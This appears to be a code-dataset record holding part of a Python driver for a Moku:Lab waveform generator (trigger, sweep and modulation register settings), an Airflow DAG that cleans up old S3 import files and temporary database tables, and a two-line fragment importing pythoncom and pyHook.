:type phase: float, degrees 0-360
:param phase: Phase offset of the wave
:raises ValueError: invalid channel number
:raises ValueOutOfRangeException: invalid waveform parameters
"""
_utils.check_parameter_valid('set', ch, [1,2],'output channel')
_utils.check_parameter_valid('range', amplitude, [0.0, 2.0],'rampwave amplitude','Volts')
_utils.check_parameter_valid('range', frequency, [0,100e6],'rampwave frequency', 'Hz')
_utils.check_parameter_valid('range', offset, [-1.0,1.0], 'rampwave offset', 'cycles')
_utils.check_parameter_valid('range', symmetry, [0,1.0], 'rampwave symmetry', 'fraction')
_utils.check_parameter_valid('range', phase, [0,360], 'rampwave phase', 'degrees')
# Ensure offset does not cause signal to exceed allowable 2.0Vpp range
upper_voltage = offset + (amplitude/2.0)
lower_voltage = offset - (amplitude/2.0)
if (upper_voltage > 1.0) or (lower_voltage < -1.0):
raise ValueOutOfRangeException("Rampwave offset limited by amplitude (max output range 2.0Vpp).")
self.gen_squarewave(ch, amplitude, frequency,
offset = offset, duty = symmetry,
risetime = symmetry,
falltime = 1 - symmetry,
phase = phase)
# Ramp waveforms not allowed for burst/sweep modes
if ch == 1:
self.ch1_is_ramp = True
else:
self.ch2_is_ramp = True
@needs_commit
def gen_off(self, ch=None):
""" Turn Waveform Generator output(s) off.
The channel will be turned on when configuring the waveform type but can be turned off
using this function. If *ch* is None (the default), both channels will be turned off,
otherwise just the one specified by the argument.
:type ch: int; {1,2} or None
:param ch: Channel to turn off, or both.
:raises ValueError: invalid channel number
:raises ValueOutOfRangeException: if the channel number is invalid
"""
_utils.check_parameter_valid('set', ch, [1,2],'output channel', allow_none=True)
if ch is None or ch == 1:
self.out1_enable = False
if ch is None or ch == 2:
self.out2_enable = False
class WaveformGenerator(BasicWaveformGenerator):
""" Waveform Generator instrument object.
To run a new Waveform Generator instrument, this should be instantiated and deployed via a connected
:any:`Moku` object using :any:`deploy_instrument`. Alternatively, a pre-configured instrument object
can be obtained by discovering an already running Waveform Generator instrument on a Moku:Lab device via
:any:`discover_instrument`.
.. automethod:: pymoku.instruments.WaveformGenerator.__init__
.. attribute:: type
:annotation: = "signal_generator"
Name of this instrument.
"""
def __init__(self):
""" Create a new WaveformGenerator instance, ready to be attached to a Moku."""
super(WaveformGenerator, self).__init__()
self._register_accessors(_siggen_mod_reg_handlers)
# Define any (non-register-mapped) properties that are used when committing
# as a commit is called when the instrument is set running
self.trig_volts_ch1 = 0.0
self.trig_volts_ch2 = 0.0
@needs_commit
def set_trigger(self, ch, mode, ncycles=1, sweep_start_freq=None, sweep_end_freq=0, sweep_duration=0, trigger_source='external', trigger_threshold=0.0, internal_trig_period=1.0, internal_trig_high=0.5):
""" Configure gated, start, ncycle or sweep trigger mode on target channel.
The trigger event can come from an ADC input channel, the opposite generated waveform, the external
trigger input (for hardware that supports that) or a internally-generated clock of configurable
period.
The trigger event can be used in several different ways:
- *gated*: The output waveform is only generated while the trigger is asserted
- *start*: The output waveform is enabled once the trigger event fires
- *ncycle*: The output waveform starts at a trigger event and completes the given number of cycles, before turning off and re-arming
- *sweep*: The trigger event starts the waveform generation at the *sweep_start_freq*, before automatically sweeping the
frequency to *sweep_end_freq* over the course of *sweep_duration* seconds.
:type ch : int
:param ch: target channel.
:type mode: string, {'gated', 'start', 'ncycle', 'sweep', 'off'}
:param mode: Select the mode in which the trigger is operated.
:type ncycles : int, [1, 1e6]
:param ncycles : integer number of signal repetitions in ncycle mode.
:type sweep_start_freq : float, [0.0,250.0e6], hertz
:param sweep_start_freq : starting sweep frequency, set to current waveform frequency if not specified. Value range may vary for different waveforms.
:type sweep_end_freq : float, [0.0,250.0e6], hertz
:param sweep_end_freq : finishing sweep frequency. Value range may vary for different waveforms.
:type sweep_duration : float, [0.0,1000.0], seconds
:param sweep_duration : sweep duration in seconds.
:type trigger_source: string {'external', 'in', 'out', 'internal'}
:param: defines which source should be used as triggering signal.
:type trigger_threshold: float, [-5, 5], volts
:param trigger_threshold: The threshold value range dependes on the source and the attenution used. Values ranges might be less for different settings.
:type internal_trig_period: float, [0,1e11], seconds
:param internal_trig_period: period of the internal trigger clock, if used.
:type internal_trig_high: float, [0,1e11], seconds
:param internal_trig_high: High time of the internal trigger clock, if used. Must be less than the internal trigger period.
"""
_utils.check_parameter_valid('set', ch, [1,2],'output channel')
_utils.check_parameter_valid('set', mode, ['gated','start','ncycle','sweep'],'trigger mode')
_utils.check_parameter_valid('set', trigger_source, ['external','in', 'out','adc','dac','internal'],'trigger source')
_utils.check_parameter_valid('range', ncycles, [0,1e6],'output channel','frequency')
_utils.check_parameter_valid('range', sweep_duration, [0.0,1000.0],'sweep duration','seconds')
_utils.check_parameter_valid('range', internal_trig_period, [100.0e-9,1000.0],'internal trigger period','seconds')
_utils.check_parameter_valid('range', internal_trig_high, [10.0e-9,1000.0],'internal trigger high time','seconds')
# Can't use modulation with trigger/sweep modes
self.gen_modulate_off(ch)
## Configure trigger source settings:
_str_to_trigger_source = {
'external' : _SG_TRIG_EXT,
'adc' : _SG_TRIG_ADC,
'in': _SG_TRIG_ADC,
'out': _SG_TRIG_DAC,
'dac' : _SG_TRIG_DAC,
'internal' : _SG_TRIG_INTER
}
source = _utils.str_to_val(_str_to_trigger_source, trigger_source, 'trigger source')
if source is _SG_TRIG_ADC:
_utils.check_parameter_valid('range', trigger_threshold, [_SG_TRIGLVL_ADC_MIN, _SG_TRIGLVL_ADC_MAX], 'trigger threshold', 'Volts')
elif source is _SG_TRIG_DAC:
_utils.check_parameter_valid('range', trigger_threshold, [_SG_TRIGLVL_DAC_MIN, _SG_TRIGLVL_DAC_MAX], 'trigger threshold', 'Volts')
## The internal trigger's duty cycle is only used in gated burst mode. Duty cycle is limited such that the duty period is not
## less than 8 ns and not greater than the trigger period minus 8 ns.
if internal_trig_high > internal_trig_period:
raise ValueOutOfRangeException("Internal trigger high must be less than or equal to the internal trigger period.")
if (internal_trig_period - internal_trig_high) <= 8.0e-9:
internal_trig_high = internal_trig_period - 10.0e-9
internal_trig_increment = math.ceil((2**64-1)/float((internal_trig_period*125*10**6)))
internal_trig_dutytarget = round((2**64-1)*(float(internal_trig_high)/float(internal_trig_period))) if mode == 'gated' else 2**63
if ch == 1:
self.trigger_select_ch1 = source
if source == _SG_TRIG_INTER:
self.internal_trig_increment_ch1 = internal_trig_increment
self.internal_trig_dutytarget_ch1 = internal_trig_dutytarget
self.adc1_statuslight = True if source == _SG_TRIG_ADC else False
elif ch == 2:
self.trigger_select_ch2 = source
if source == _SG_TRIG_INTER:
self.internal_trig_increment_ch2 = internal_trig_increment
self.internal_trig_dutytarget_ch2 = internal_trig_dutytarget
self.adc2_statuslight = True if source == _SG_TRIG_ADC else False
# Configure trigger mode settings and evaluate exception conditions:
if sweep_start_freq is None:
channel_frequency = self.out1_frequency if ch == 1 else self.out2_frequency
else:
channel_frequency = sweep_start_freq
# check the wavefrom parameter
waveform = self.out1_waveform if ch == 1 else self.out2_waveform
#if waveform is a sinewave certain ranges do change
if waveform == _SG_WAVE_SINE:
_utils.check_parameter_valid('range', sweep_end_freq, [0.0,250.0e6],'sweep finishing frequency','frequency')
_utils.check_parameter_valid('range', channel_frequency, [0.0,250.0e6],'sweep starting frequency','frequency')
else:
_utils.check_parameter_valid('range', sweep_end_freq, [0.0,100.0e6],'sweep finishing frequency','frequency')
_utils.check_parameter_valid('range', channel_frequency, [0.0,100.0e6],'sweep starting frequency','frequency')
# Ramp waveform cannot be used for any burst/sweep mode:
is_ramp = self.ch1_is_ramp if ch == 1 else self.ch2_is_ramp
if is_ramp == _SG_WAVE_TRIANGLE:
raise ValueOutOfRangeException("Ramp waveforms cannot be used in burst/sweep modes.")
_str_to_trigger_mode = {
'gated' : _SG_TRIG_MODE_GATE,
'start' : _SG_TRIG_MODE_START,
'ncycle' : _SG_TRIG_MODE_NCYCLE,
'sweep' : _SG_TRIG_MODE_SWEEP
}
mode = _utils.str_to_val(_str_to_trigger_mode, mode, 'trigger mode')
# Pulse waveform edge must be minimum for gated burst mode and sweep mode:
if (mode is _SG_TRIG_MODE_GATE or mode is _SG_TRIG_MODE_SWEEP) and waveform != 0: #'sine':
if ch == 1 and self.ch1_edgetime_nonzero == True:
raise ValueOutOfRangeException("Pulse waveform rise and fall times must be set to zero for gated burst mode and sweep mode.")
if ch == 2 and self.ch2_edgetime_nonzero == True:
raise ValueOutOfRangeException("Pulse waveform rise and fall times must be set to zero for gated burst mode and sweep mode.")
# Waveform frequencies are restricted to <= 10 MHz in Ncycle burst mode:
if mode is _SG_TRIG_MODE_NCYCLE and channel_frequency > 10.0e6:
raise ValueOutOfRangeException("Waveform frequencies are restricted to 10 MHz or less in Ncycle burst mode.")
# Internal trigger source cannot be used for burst start mode:
trigger_source = self.trigger_select_ch1 if ch == 1 else self.trigger_select_ch2
if mode is _SG_TRIG_MODE_START and trigger_source == 3:
raise ValueOutOfRangeException("The internal trigger source cannot be used in start burst mode.")
# ensure combination of signal frequency and Ncycles doesn't cause 64 bit register overflow:
if mode is _SG_TRIG_MODE_NCYCLE:
signal_period = 0 if channel_frequency == 0.0 else channel_frequency**-1
FPGA_cycles = math.ceil(125e6 * signal_period * ncycles)
if FPGA_cycles > 2**63-1:
raise ValueOutOfRangeException("NCycle Register Overflow")
if mode is _SG_TRIG_MODE_SWEEP:
phase_increment = math.ceil((float(2**31 * 2**48) / float(125*10**15)) * float(sweep_end_freq - channel_frequency)/float(sweep_duration))
sweep_length_FPGA_cycles = math.ceil(125e6 * sweep_duration)
init_freq = channel_frequency * math.ceil(float(2**48)/float(10**9))
if ch == 1:
self.trig_volts_ch1 = trigger_threshold
self.trig_sweep_mode_ch1 = mode
if mode is _SG_TRIG_MODE_NCYCLE:
self.ncycles_period_ch1 = FPGA_cycles
if mode is _SG_TRIG_MODE_SWEEP:
self.sweep_length_ch1 = sweep_length_FPGA_cycles
self.sweep_init_freq_ch1 = init_freq
self.sweep_increment_ch1 = phase_increment
elif ch == 2:
self.trig_volts_ch2 = trigger_threshold
self.trig_sweep_mode_ch2 = mode
if mode is _SG_TRIG_MODE_NCYCLE:
self.ncycles_period_ch2 = FPGA_cycles
if mode is _SG_TRIG_MODE_SWEEP:
self.sweep_length_ch2 = sweep_length_FPGA_cycles
self.sweep_init_freq_ch2 = init_freq
self.sweep_increment_ch2 = phase_increment
def _update_dependent_regs(self):
# Trigger level must be scaled depending on the current relay settings and chosen trigger source
g1, g2 = self._adc_gains()
d1, d2 = self._dac_gains()
if self.trigger_select_ch1 == _SG_TRIG_ADC:
try:
self.trig_ADC_threshold_ch1 = self.trig_volts_ch1 / g1
except ValueOutOfRangeException:
raise ValueOutOfRangeException("Invalid Trigger threshold on channel 1. Valid range for input is [-0.5, 0.5] and if attenution is on [-5, 5].")
if self.trigger_select_ch2 == _SG_TRIG_ADC:
try:
self.trig_ADC_threshold_ch2 = self.trig_volts_ch2 / g2
except ValueOutOfRangeException:
raise ValueOutOfRangeException("Invalid Trigger threshold on channel 2. Valid range for input is [-0.5, 0.5] and if attenution is on [-5, 5].")
if self.trigger_select_ch1 == _SG_TRIG_DAC:
try:
self.trig_DAC_threshold_ch2 = self.trig_volts_ch1 / d2
except ValueOutOfRangeException:
raise ValueOutOfRangeException("Invalid Trigger threshold on channel 1. Valid range for output is [-1, 1].")
if self.trigger_select_ch2 == _SG_TRIG_DAC:
try:
self.trig_DAC_threshold_ch1 = self.trig_volts_ch2 / d1
except ValueOutOfRangeException:
raise ValueOutOfRangeException("Invalid Trigger threshold on channel 2. Valid range for output is [-1, 1] .")
@needs_commit
def gen_trigger_off(self, ch=None):
"""
Turn off trigger/sweep mode for the specified output channel.
If *ch* is None (the default), both channels will be turned off,
otherwise just the one specified by the argument.
:type ch: int; {1,2} or None
:param ch: Output channel to turn trigger/sweep mode off
"""
_utils.check_parameter_valid('set', ch, [1,2],'output channel', allow_none=True)
if ch==1:
self.trig_sweep_mode_ch1 = 0
elif ch==2:
self.trig_sweep_mode_ch2 = 0
else:
self.trig_sweep_mode_ch1 = 0
self.trig_sweep_mode_ch2 = 0
@needs_commit
def gen_modulate_off(self, ch=None):
"""
Turn off modulation for the specified output channel.
If *ch* is None (the default), both channels will be turned off,
otherwise just the one specified by the argument.
:type ch: int; {1,2} or None
:param ch: Output channel to turn modulation off.
"""
# Disable modulation by clearing modulation type bits
_utils.check_parameter_valid('set', ch, [1,2],'output channel', allow_none=True)
if ch==1:
self.out1_modulation = 0
if ch==2:
self.out2_modulation = 0
@needs_commit
def gen_modulate(self, ch, mtype, source, depth, frequency=0.0):
"""
Set up modulation on an output channel.
:type ch: int; {1,2}
:param ch: Channel to modulate
:type mtype: string, {amplitude', 'frequency', 'phase'}
:param mtype: Modulation type. Respectively Off, Amplitude, Frequency and Phase modulation.
:type source: string, {'internal', 'in', 'out'}
:param source: Modulation source. Respectively Internal Sinewave, associated input channel or opposite output channel.
:type depth: float 0-1, 0-125MHz or 0 - 360 deg
:param depth: Modulation depth (depends on modulation type): Fractional modulation depth, Frequency Deviation/Volt or Phase shift
:type frequency: float
:param frequency: Frequency of internally-generated sine wave modulation. This parameter is ignored if the source is set to ADC or DAC.
:raises ValueOutOfRangeException: if the channel number is invalid or modulation parameters can't be achieved
"""
_utils.check_parameter_valid('set', ch, [1,2],'output modulation channel')
_utils.check_parameter_valid('range', frequency, [0,250e6],'internal modulation frequency')
# Can't use trigger/sweep modes at the same time as modulation
self.gen_trigger_off(ch)
_str_to_modsource = {
'internal' : _SG_MODSOURCE_INT,
'in' : _SG_MODSOURCE_ADC,
'out' : _SG_MODSOURCE_DAC
}
_str_to_modtype = {
'amplitude' : _SG_MOD_AMPL,
'frequency' : _SG_MOD_FREQ,
'phase' : _SG_MOD_PHASE
}
source = _utils.str_to_val(_str_to_modsource, source, 'modulation source')
mtype = _utils.str_to_val(_str_to_modtype, mtype, 'modulation source')
# Calculate the depth value depending on modulation source and type
depth_parameter = 0.0
if mtype == _SG_MOD_AMPL:
_utils.check_parameter_valid('range', depth, [0.0,1.0], 'amplitude modulation depth', 'fraction')
depth_parameter = depth
elif mtype == _SG_MOD_FREQ:
_utils.check_parameter_valid('range', depth, [0.0,_SG_MOD_FREQ_MAX], 'frequency modulation depth', 'Hz/V')
depth_parameter = depth/(DAC_SMP_RATE/8.0)
elif mtype == _SG_MOD_PHASE:
_utils.check_parameter_valid('range', depth, [0.0, 360.0], 'phase modulation depth', 'degrees/V')
depth_parameter = depth/360.0
# Get the calibration coefficients of the front end and output
dac1, dac2 = self._dac_gains()
adc1, adc2 = self._adc_gains()
if ch == 1:
self.out1_modulation = mtype
self.out1_modsource = source
self.mod1_frequency = frequency
self.adc1_statuslight = True if source == _SG_MODSOURCE_ADC else False
elif ch == 2:
self.out2_modulation = mtype
self.out2_modsource = source
self.mod2_frequency = frequency
self.adc2_statuslight = True if source == _SG_MODSOURCE_ADC else False
# Calibrate the depth value depending on the source
if(source == _SG_MODSOURCE_INT):
depth_parameter *= 1.0 # No change in depth
elif(source == _SG_MODSOURCE_DAC):
# Opposite DAC is used
depth_parameter = depth_parameter * pow(2.0,15.0) * (dac2 if ch == 1 else dac1)
elif(source == _SG_MODSOURCE_ADC):
# Associated ADC for current channel
depth_parameter = depth_parameter * pow(2.0,9.0) * (adc1 if ch == 1 else adc2)
if ch == 1:
self.mod1_amplitude = (pow(2.0, 32.0) - 1) * depth_parameter / 4.0
elif ch == 2:
self.mod2_amplitude = (pow(2.0, 32.0) - 1) * depth_parameter / 4.0
def commit(self):
self._update_dependent_regs()
# Commit the register values to the device
super(WaveformGenerator, self).commit()
# Bring in the docstring from the superclass for our docco.
commit.__doc__ = MokuInstrument.commit.__doc__
_siggen_mod_reg_handlers = {
'out1_modulation': (REG_SG_WAVEFORMS, to_reg_unsigned(16, 8, allow_range=[_SG_MOD_NONE, _SG_MOD_AMPL | _SG_MOD_FREQ | _SG_MOD_PHASE]),
from_reg_unsigned(16, 8)),
'out2_modulation': (REG_SG_WAVEFORMS, to_reg_unsigned(24, 8, allow_range=[_SG_MOD_NONE, _SG_MOD_AMPL | _SG_MOD_FREQ | _SG_MOD_PHASE]),
from_reg_unsigned(24, 8)),
'mod1_frequency': ((REG_SG_MODF1_H, REG_SG_MODF1_L),
lambda obj, f, old: ((old[0] & 0x0000FFFF) | (_usgn(f/_SG_FREQSCALE, 48) >> 16) & 0xFFFF0000, _usgn(f/_SG_FREQSCALE, 48) & 0xFFFFFFFF),
lambda obj, rval: _SG_FREQSCALE * ((rval[0] & 0xFFFF0000) << 16 | rval[1])),
'mod2_frequency': ((REG_SG_MODF2_H, REG_SG_MODF2_L),
lambda obj, f, old: ((old[0] & 0x0000FFFF) | (_usgn(f/_SG_FREQSCALE, 48) >> 16) & 0xFFFF0000, _usgn(f/_SG_FREQSCALE, 48) & 0xFFFFFFFF),
lambda obj, rval: _SG_FREQSCALE * ((rval[0] & 0xFFFF0000) << 16 | rval[1])),
# The meaning of this amplitude field is complicated enough that the conversion to register value is done in the
# main code above rather than inline
'mod1_amplitude': (REG_SG_MODA1, to_reg_unsigned(0, 32),
from_reg_unsigned(0, 32)),
'mod2_amplitude': (REG_SG_MODA2, to_reg_unsigned(0, 32),
from_reg_unsigned(0, 32)),
'out1_modsource': (REG_SG_MODSOURCE, to_reg_unsigned(1, 2, allow_set=[_SG_MODSOURCE_INT, _SG_MODSOURCE_ADC, _SG_MODSOURCE_DAC]),
from_reg_unsigned(1, 2)),
'out2_modsource': (REG_SG_MODSOURCE, to_reg_unsigned(3, 2, allow_set=[_SG_MODSOURCE_INT, _SG_MODSOURCE_ADC, _SG_MODSOURCE_DAC]),
from_reg_unsigned(3, 2))
}
_siggen_reg_handlers = {
'out1_enable': (REG_SG_WAVEFORMS, to_reg_bool(0), from_reg_bool(0)),
'out2_enable': (REG_SG_WAVEFORMS, to_reg_bool(1), from_reg_bool(1)),
'out1_waveform': (REG_SG_WAVEFORMS, to_reg_unsigned(4, 3, allow_set=[_SG_WAVE_SINE, _SG_WAVE_SQUARE, _SG_WAVE_TRIANGLE, _SG_WAVE_DC, _SG_WAVE_PULSE]),
from_reg_unsigned(4, 3)),
'out2_waveform': (REG_SG_WAVEFORMS, to_reg_unsigned(8, 3, allow_set=[_SG_WAVE_SINE, _SG_WAVE_SQUARE, _SG_WAVE_TRIANGLE, _SG_WAVE_DC, _SG_WAVE_PULSE]),
from_reg_unsigned(8, 3)),
'out1_clipsine': (REG_SG_WAVEFORMS, to_reg_bool(7), from_reg_bool(7)),
'out2_clipsine': (REG_SG_WAVEFORMS, to_reg_bool(11), from_reg_bool(11)),
'out1_frequency': ((REG_SG_FREQ1_H, REG_SG_FREQ1_L),
to_reg_unsigned(0, 48, xform=lambda obj, f:f / _SG_FREQSCALE),
from_reg_unsigned(0, 48, xform=lambda obj, f: f * _SG_FREQSCALE)),
'out2_frequency': ((REG_SG_FREQ2_H, REG_SG_FREQ2_L),
to_reg_unsigned(0, 48, xform=lambda obj, f:f / _SG_FREQSCALE),
from_reg_unsigned(0, 48, xform=lambda obj, f: f * _SG_FREQSCALE)),
'out1_offset': (REG_SG_MODF1_H, to_reg_signed(0, 16, xform=lambda obj, o:o / obj._dac_gains()[0]),
from_reg_signed(0, 16, xform=lambda obj, o: o * obj._dac_gains()[0])),
'out2_offset': (REG_SG_MODF2_H, to_reg_signed(0, 16, xform=lambda obj, o:o / obj._dac_gains()[1]),
from_reg_signed(0, 16, xform=lambda obj, o: o * obj._dac_gains()[1])),
'out1_phase': (REG_SG_PHASE1, to_reg_unsigned(0, 32, xform=lambda obj, p: (p / _SG_PHASESCALE) % (2**32)),
from_reg_unsigned(0, 32, xform=lambda obj, p:p * _SG_PHASESCALE)),
'out2_phase': (REG_SG_PHASE2, to_reg_unsigned(0, 32, xform=lambda obj, p: (p / _SG_PHASESCALE) % (2**32)),
from_reg_unsigned(0, 32, xform=lambda obj, p:p * _SG_PHASESCALE)),
'out1_amplitude': (REG_SG_AMP1, to_reg_unsigned(0, 16, xform=lambda obj, a:a / obj._dac_gains()[0]),
from_reg_unsigned(0, 16, xform=lambda obj, a:a * obj._dac_gains()[0])),
'out2_amplitude': (REG_SG_AMP2, to_reg_unsigned(0, 16, xform=lambda obj, a:a / obj._dac_gains()[1]),
from_reg_unsigned(0, 16, xform=lambda obj, a:a * obj._dac_gains()[1])),
'out1_t0': (REG_SG_T01, to_reg_unsigned(0, 32, xform=lambda obj, o: o / _SG_TIMESCALE),
from_reg_unsigned(0, 32, xform=lambda obj, o: o * _SG_TIMESCALE)),
'out1_t1': (REG_SG_T11, to_reg_unsigned(0, 32, xform=lambda obj, o: o / _SG_TIMESCALE),
from_reg_unsigned(0, 32, xform=lambda obj, o: o * _SG_TIMESCALE)),
'out1_t2': (REG_SG_T21, to_reg_unsigned(0, 32, xform=lambda obj, o: o / _SG_TIMESCALE) ,
from_reg_unsigned(0, 32, xform=lambda obj, o: o * _SG_TIMESCALE)),
'out2_t0': (REG_SG_T02, to_reg_unsigned(0, 32, xform=lambda obj, o: o / _SG_TIMESCALE),
from_reg_unsigned(0, 32, xform=lambda obj, o: o * _SG_TIMESCALE)),
'out2_t1': (REG_SG_T12, to_reg_unsigned(0, 32, xform=lambda obj, o: o / _SG_TIMESCALE),
from_reg_unsigned(0, 32, xform=lambda obj, o: o * _SG_TIMESCALE )),
'out2_t2': (REG_SG_T22, to_reg_unsigned(0, 32, xform=lambda obj, o: o / _SG_TIMESCALE ),
from_reg_unsigned(0, 32, xform=lambda obj, o: o * _SG_TIMESCALE )),
'out1_riserate': ((REG_SG_RFRATE1_H, REG_SG_RISERATE1_L),
to_reg_unsigned(0, 48, xform=lambda obj, r: r / _SG_FREQSCALE),
from_reg_unsigned(0, 48, xform=lambda obj, r: r * _SG_FREQSCALE)),
'out1_fallrate': ((REG_SG_RFRATE1_H, REG_SG_FALLRATE1_L),
lambda obj, f, old: ((old[0] & 0x0000FFFF) | (_usgn(f/_SG_FREQSCALE, 48) >> 16) & 0xFFFF0000, _usgn(f/_SG_FREQSCALE, 48) & 0xFFFFFFFF),
lambda obj, rval: _SG_FREQSCALE * ((rval[0] & 0xFFFF0000) << 16 | rval[1])),
'out2_riserate': ((REG_SG_RFRATE2_H, REG_SG_RISERATE2_L),
to_reg_unsigned(0, 48, xform=lambda obj, r: r / _SG_FREQSCALE),
from_reg_unsigned(0, 48, xform=lambda obj, r: r * _SG_FREQSCALE)),
'out2_fallrate': ((REG_SG_RFRATE2_H, REG_SG_FALLRATE2_L),
lambda obj, f, old: ((old[0] & 0x0000FFFF) | (_usgn(f/_SG_FREQSCALE, 48) >> 16) & 0xFFFF0000, _usgn(f/_SG_FREQSCALE, 48) & 0xFFFFFFFF),
lambda obj, rval: _SG_FREQSCALE * ((rval[0] & 0xFFFF0000) << 16 | rval[1])),
'out1_amp_pc': (REG_SG_PRECLIP, to_reg_unsigned(0, 16, xform=lambda obj, a: a / obj._dac_gains()[0]),
from_reg_unsigned(0, 16, xform=lambda obj, a: a * obj._dac_gains()[0])),
'out2_amp_pc': (REG_SG_PRECLIP, to_reg_unsigned(16, 16, xform=lambda obj, a: a / obj._dac_gains()[1]),
from_reg_unsigned(16, 16, xform=lambda obj, a: a * obj._dac_gains()[1])),
'internal_trig_increment_ch1': ((REG_SG_TrigPeriodInternalCH0_H, REG_SG_TrigPeriodInternalCH0_L),
to_reg_unsigned(0,64), from_reg_unsigned(0,64)),
'internal_trig_increment_ch2': ((REG_SG_TrigPeriodInternalCH1_H, REG_SG_TrigPeriodInternalCH1_L),
to_reg_unsigned(0,64), from_reg_unsigned(0,64)),
'internal_trig_dutytarget_ch1': ((REG_SG_TrigDutyInternalCH0_H, REG_SG_TrigDutyInternalCH0_L),
to_reg_unsigned(0,64), from_reg_unsigned(0,64)),
'internal_trig_dutytarget_ch2': ((REG_SG_TrigDutyInternalCH1_H, REG_SG_TrigDutyInternalCH1_L),
to_reg_unsigned(0,64), from_reg_unsigned(0,64)),
'trig_ADC_threshold_ch1': (REG_SG_ADCThreshold, to_reg_signed(0,12), from_reg_signed(0,12)),
'trig_ADC_threshold_ch2': (REG_SG_ADCThreshold, to_reg_signed(12,12), from_reg_signed(12,12)),
'trig_DAC_threshold_ch1': (REG_SG_DACThreshold, to_reg_signed(0,16), from_reg_signed(0,16)),
'trig_DAC_threshold_ch2': (REG_SG_DACThreshold, to_reg_signed(16,16), from_reg_signed(16,16)),
'trig_sweep_mode_ch1': (REG_SG_TrigSweepMode, to_reg_unsigned(0,3), from_reg_unsigned(0,3)),
'trig_sweep_mode_ch2': (REG_SG_TrigSweepMode, to_reg_unsigned(3,3), from_reg_unsigned(3,3)),
'trigger_select_ch1': (REG_SG_TrigSweepMode, to_reg_unsigned(6,2), from_reg_unsigned(6,2)),
'trigger_select_ch2': (REG_SG_TrigSweepMode, to_reg_unsigned(8,2), from_reg_unsigned(8,2)),
'sweep_length_ch1': ((REG_SG_SweepLengthCh0_H, REG_SG_SweepLengthCh0_L),
to_reg_unsigned(0,64), from_reg_unsigned(0,64)),
'sweep_length_ch2': ((REG_SG_SweepLengthCh1_H, REG_SG_SweepLengthCh1_L),
to_reg_unsigned(0,64), from_reg_unsigned(0,64)),
'sweep_init_freq_ch1': ((REG_SG_SweepInitFreqCh0_H, REG_SG_SweepInitFreqCh0_L),
to_reg_unsigned(0,48), from_reg_unsigned(0,48)),
'sweep_init_freq_ch2': ((REG_SG_SweepInitFreqCh1_H, REG_SG_SweepInitFreqCh1_L),
to_reg_unsigned(0,48), from_reg_unsigned(0,48)),
'sweep_increment_ch1': ((REG_SG_SweepIncrementCh0_H, REG_SG_SweepIncrementCh0_L),
to_reg_signed(0,64), from_reg_signed(0,64)),
'sweep_increment_ch2': ((REG_SG_SweepIncrementCh1_H, REG_SG_SweepIncrementCh1_L),
to_reg_signed(0,64), from_reg_signed(0,64)),
'ncycles_period_ch1': ((REG_SG_NCycles_TrigDutyCH0_H, REG_SG_NCycles_TrigDutyCH0_L),
to_reg_unsigned(0,64), from_reg_unsigned(0,64)),
'ncycles_period_ch2': ((REG_SG_NCycles_TrigDutyCH1_H, REG_SG_NCycles_TrigDutyCH1_L),
to_reg_unsigned(0,64), from_reg_unsigned(0,64)),
'adc1_statuslight': (REG_SG_MODSOURCE, to_reg_unsigned(5, 1),
from_reg_unsigned(5, 1)),
'adc2_statuslight': (REG_SG_MODSOURCE, to_reg_unsigned(6, 1),
from_reg_unsigned(6, 1))
}
|
StarcoderdataPython
|
9712414
|
<reponame>akumuthan-dev/data-flow
import re
from datetime import datetime, timedelta
from functools import partial
from airflow import DAG
from airflow.hooks.S3_hook import S3Hook
from airflow.hooks.postgres_hook import PostgresHook
from airflow.operators.python_operator import PythonOperator
import sqlalchemy as sa
from dataflow import config
from dataflow.utils import logger, slack_alert
def cleanup_old_s3_files(*args, **kwargs):
s3 = S3Hook("DEFAULT_S3")
bucket = s3.get_bucket(config.S3_IMPORT_DATA_BUCKET)
current_time = datetime.strptime(kwargs["ts_nodash"], "%Y%m%dT%H%M%S")
logger.info(
f"Retention period is {config.S3_RETENTION_PERIOD_DAYS} days before {current_time}"
)
pipelines = s3.list_prefixes(
config.S3_IMPORT_DATA_BUCKET, prefix="import-data/", delimiter="/"
)
for pipeline in pipelines:
run_ids = sorted(
s3.list_prefixes(
config.S3_IMPORT_DATA_BUCKET, prefix=pipeline, delimiter="/"
)
)
for run_id in run_ids:
run_dt = datetime.strptime(run_id.split("/")[-2], "%Y%m%dT%H%M%S")
if run_id == run_ids[-1]:
logger.info(
f"Keeping {pipeline} run {run_id} ({run_dt}) - always retain the last run."
)
elif current_time - run_dt >= timedelta(
days=config.S3_RETENTION_PERIOD_DAYS
):
logger.info(
f"Deleting {pipeline} run {run_id} ({run_dt}) older than retention period"
)
bucket.objects.filter(Prefix=run_id).delete()
else:
logger.info(f"Keeping {pipeline} run {run_id} ({run_dt})")
def cleanup_old_datasets_db_tables(*args, **kwargs):
engine = sa.create_engine(
'postgresql+psycopg2://',
creator=PostgresHook(postgres_conn_id=config.DATASETS_DB_NAME).get_conn,
)
current_time = datetime.strptime(kwargs["ts_nodash"], "%Y%m%dT%H%M%S")
logger.info(
f"Retention period is {config.DB_TEMP_TABLE_RETENTION_PERIOD_DAYS} days before {current_time}"
)
with engine.begin() as conn:
tables = [
table
for table in conn.execute(
'''
SELECT schemaname, tablename
FROM pg_catalog.pg_tables
WHERE schemaname NOT IN ('dataflow', 'information_schema')
AND schemaname NOT LIKE '\\_%%'
AND schemaname NOT LIKE 'pg_%%'
'''
)
]
for table in tables:
schema, table_name = table
table_match = re.match(r"(.*)_(\d{8}t\d{6})(?:_swap)?", table_name)
if not table_match:
logger.info(f"Skipping {schema}.{table_name}")
continue
table_dt = datetime.strptime(table_match.groups()[1], "%Y%m%dt%H%M%S")
if current_time - table_dt >= timedelta(
days=config.DB_TEMP_TABLE_RETENTION_PERIOD_DAYS
):
if table_match.groups()[0] not in [table[1] for table in tables]:
logger.warning(
f"Main table {table_match.groups()[0]} missing for {schema}.{table_name}, skipping"
)
else:
logger.info(
f"Deleting temporary table {schema}.{table_name} ({table_dt}) older than retention period"
)
conn.execute(
"DROP TABLE {}.{}".format(
engine.dialect.identifier_preparer.quote(schema),
engine.dialect.identifier_preparer.quote(table_name),
)
)
else:
logger.info(f"Keeping table {schema}.{table_name}")
dag = DAG(
"Maintenance",
catchup=False,
start_date=datetime(2020, 4, 7),
schedule_interval="@daily",
on_failure_callback=partial(slack_alert, success=False),
)
dag << PythonOperator(
task_id='clean-up-s3', python_callable=cleanup_old_s3_files, provide_context=True
)
dag << PythonOperator(
task_id='clean-up-datasets-db',
python_callable=cleanup_old_datasets_db_tables,
provide_context=True,
)
|
StarcoderdataPython
|
11302981
|
__author__ = "<NAME>"
import pythoncom
import pyHook
